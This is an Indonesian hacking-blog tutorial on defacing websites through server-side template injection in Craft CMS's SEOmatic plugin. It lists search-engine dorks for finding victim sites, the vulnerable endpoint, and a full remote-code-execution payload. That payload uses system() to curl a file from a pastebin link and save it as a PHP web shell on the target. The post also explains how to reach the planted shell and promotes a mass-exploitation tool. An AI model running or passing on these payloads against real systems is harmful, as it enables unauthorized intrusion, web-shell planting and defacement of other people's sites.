Beranda
Vulnerability

SSTI (Server Side Template Injection) Rce Upload Shell

Yogi

Hallo Sahabat, BLOG-GAN.ORG. Pada kesempatan kali ini saya akan membagikan tutorial deface SSTI ( Server Side Template Injection).

Okeh Daripada Bincang Bincang Tidak Membuahkan Hasil Langsung Saja Menujut Tutorialnya.


Dork : 

- inurl:/humans.txt intext:"Craft CMS"
- intext:SEOmatic filetype:txt
- site:*/humans.txt intext:SEOmatic
- /* TEAM */ inurl:/humans.txt

Kembangin Lagi Biar Lebih Maknyoss.

Exploit : 

/actions/seomatic/meta-container/all-meta-containers?uri=


Nah Untuk Langkah Selanjutnya Kalian Dorking Seperti Biasa Di Search Engine Seperti Google Atau Bing Terserah Kalian.

Nah Jika Sudah Melakukan Dorking ,Maka Disitu Akan Banyak Sekali Site Site Yang Dimana Nantinya Akan Kita Exploitasi.

Pilih Salah Satu Target Sobat . Selanjutnya Kalian Masukan Exploit ,Tepat Di Belakang Nama Domain

Contoh

 http://site.com//actions/seomatic/meta-container/all-meta-containers?uri=


Nah Jika Vuln Maka Akan Muncul Banyak Tulisan Seperti Gambar Di Bawah Ini !!!



Nah Sudah Menemukan Website Yang Vuln? Selanjutnya Kita Melakukan Rce Atau Remote Code Excution. 

{{craft.app.view.evaluateDynamicContent(%27print(system(%22curl\x20https://pastebin.com/raw/Vqnc39AR\x20%3E\x20php.php%22));%27)}}


Nah Untuk Melakukan Exploitnya Sebagai Contoh :

https://site.com//actions/seomatic/meta-container/all-meta-containers?uri={{craft.app.view.evaluateDynamicContent(%27print(system(%22curl\x20https://pastebin.com/raw/Vqnc39AR\x20%3E\x20php.php%22));%27)}}

Nah Seperti Ini Kalian Bisa Mengubah Link Pastebin dan Juga extensi Shell kalian Sesuai Selera Masing Masing.

Dan Jika Sudah Melakukan Rce seperti Di Atas Selanjutnya Kalian Cek Shell Kalian . Oh Iya Shellnya Ada Di bagian /public_html/ 

Contoh : http://site.com/php.php


Nah Disini Mimin Juga Akan Membagikan Tools Mass Reverse SSTI (Server Side Template Injection) Disini Saya Menggunakan Source Code Python :3 
Kenapa Saya Membuat Tools Hanya Mass Reverse Bukan Langsung Upload Shell? Ya Karena Kemarin Saya Jalanin Tools Saya Yang Auto Upload Shell, Pas Di Buka Masih Ada Shellnya ,Pas Di Refresh  Shell Auto Kedelet :'v Jadi Kalian Manual Aja Biar Bisa Bypas Bypass  H3H3.


Berkeinginan  Mencobanya? Klik Disini Babe 


Tutorial Buat Jalaninnya Bisa Dilihat Di Bawah Sini !!!

Getting Info...

1 komentar

  1. Bang tutorial buat tools python kek gitu dong bang
Berkomentarlah Dengan Sopan Paman :)
Anda sopan Kami segan :)
Cookie Consent
We serve cookies on this site to analyze traffic, remember your preferences, and optimize your experience.
More Details